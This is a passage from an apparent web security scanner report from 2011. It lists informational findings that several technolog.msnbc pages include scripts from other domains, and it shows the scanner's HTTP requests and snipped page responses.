Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:42:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143856

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.352. http://technolog.msnbc.redacted/microsoft

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /microsoft

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /microsoft HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:37:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149020

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5774095" class="inlineCode photo_align_right" data-contentid="5774095"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5772484" class="inlineCode photo_align_right" data-contentid="5772484"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5764263" class="inlineCode photo_align_right" data-contentid="5764263"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.353. http://technolog.msnbc.redacted/motion-controls

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /motion-controls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /motion-controls HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176880

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5807115" class="inlineCode photo_align_block" data-contentid="5807115"><script type='text/javascript' src='http://ww2.KKTV.com/global/video/videoplayer.js?rnd=972561;hostDomain=ww2.KKTV.com;playerWidth=640;playerHeight=480;isShowIcon=true;clipId=5447758;flvUri=;partnerclipid=;adTag=News;advertisingZone=undefined;enableAds=false;landingPage=http%253A%252F%252Fwww.kktv.com%252Fvideo%252F;islandingPageoverride=false;playerType=MINI_EMBEDDEDscript'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.354. http://technolog.msnbc.redacted/nintendo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /nintendo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nintendo HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=291
Date: Sun, 30 Jan 2011 02:43:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145325

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.355. http://technolog.msnbc.redacted/nintendo-3ds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /nintendo-3ds

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nintendo-3ds HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143427

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.356. http://technolog.msnbc.redacted/online-privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /online-privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /online-privacy HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:48:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139388

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
